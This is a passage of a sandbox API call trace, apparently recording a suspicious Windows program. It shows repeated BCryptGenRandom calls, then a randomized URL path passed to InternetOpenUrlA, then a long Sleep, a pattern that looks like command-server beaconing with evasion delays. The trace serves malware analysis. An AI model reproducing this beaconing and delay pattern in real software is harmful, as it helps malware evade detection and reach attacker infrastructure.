pbBuffer=0x46ffd5e) returned 0x0 [0272.943] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.943] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.944] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.944] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.944] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.944] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.944] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.944] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.944] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.944] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.945] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.945] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.945] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.945] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.945] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.945] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.945] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.945] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.945] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.945] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.946] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.946] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.129] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.129] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.129] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.129] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.130] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.130] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.130] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.130] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0273.130] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.130] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0273.130] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.130] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d4ee1, cbBuffer=0x2e, dwFlags=0x2 | out: pbBuffer=0x4d4ee1) returned 0x0 [0273.131] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.131] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.131] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.131] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.131] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.131] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.131] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.131] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.131] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.132] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0273.132] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.132] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.132] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.132] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0273.132] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.132] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0273.132] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.132] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0273.133] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.133] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.133] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.133] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.133] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.133] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.133] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.133] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0273.134] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.134] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.134] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.134] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.134] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.134] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.134] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.134] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.135] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.135] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.135] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.135] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.135] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.135] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.135] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.135] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.135] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.135] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.136] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.136] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0273.136] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.136] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.136] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.136] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0273.136] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.136] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.137] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.137] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0273.137] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.137] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0273.137] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.137] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.137] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.138] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0273.138] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.138] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d4f0f, cbBuffer=0x16, dwFlags=0x2 | out: pbBuffer=0x4d4f0f) returned 0x0 [0273.138] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.138] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0273.139] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.139] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.139] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.139] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.139] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.139] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.140] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.140] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0273.140] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.140] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0273.140] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.140] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.140] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.141] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.141] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.141] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.141] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.141] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.141] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.141] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0273.141] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.141] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.142] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.142] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.142] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.142] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0273.142] GetProcessHeap () returned 0x440000 [0273.142] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473140 [0273.142] lstrcpyA (in: lpString1=0x473140, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0273.142] lstrcatA (in: lpString1="\x04", lpString2="/80pmm2kesrjfeAnXaPbQ95sDd/sPB9oadc0ww2lfS7uwnl0/pesocI4Gg13dCC0udbb9Ey7ugmFtUqlZjae5Zj8sP3nvo/O0ajt48mXimvp6Bb9c1uT/" | out: lpString1="\x04/80pmm2kesrjfeAnXaPbQ95sDd/sPB9oadc0ww2lfS7uwnl0/pesocI4Gg13dCC0udbb9Ey7ugmFtUqlZjae5Zj8sP3nvo/O0ajt48mXimvp6Bb9c1uT/") returned="\x04/80pmm2kesrjfeAnXaPbQ95sDd/sPB9oadc0ww2lfS7uwnl0/pesocI4Gg13dCC0udbb9Ey7ugmFtUqlZjae5Zj8sP3nvo/O0ajt48mXimvp6Bb9c1uT/" [0273.142] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0273.142] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/80pmm2kesrjfeAnXaPbQ95sDd/sPB9oadc0ww2lfS7uwnl0/pesocI4Gg13dCC0udbb9Ey7ugmFtUqlZjae5Zj8sP3nvo/O0ajt48mXimvp6Bb9c1uT/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0273.143] GetProcessHeap () returned 0x440000 [0273.143] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473140 | out: hHeap=0x440000) returned 1 [0273.143] GetProcessHeap () returned 0x440000 [0273.143] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4d4eb0 | out: hHeap=0x440000) returned 1 [0273.143] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0273.143] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0273.143] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.143] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0273.144] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0273.144] Sleep (dwMilliseconds=0x135f7) [0273.329] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.329] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0273.330] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.330] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0273.330] GetProcessHeap () returned 0x440000 [0273.330] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x95) returned 0x3a16f80 [0273.330] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.330] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0273.330] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.330] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a16f81, cbBuffer=0x22, dwFlags=0x2 | out: pbBuffer=0x3a16f81) returned 0x0 [0273.330] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.330] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.331] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.331] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.331] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.331] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.331] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.331] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.331] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.331] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.332] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.332] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.332] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.332] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.332] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.332] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.332] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.332] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.333] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.333] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0273.333] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.333] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.333] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.333] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.333] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.333] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0273.334] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.334] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.334] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.334] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.334] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.334] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.334] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.334] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.335] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.335] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.335] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.335] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0273.335] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.335] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.335] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.335] BCryptGenRandom (in: 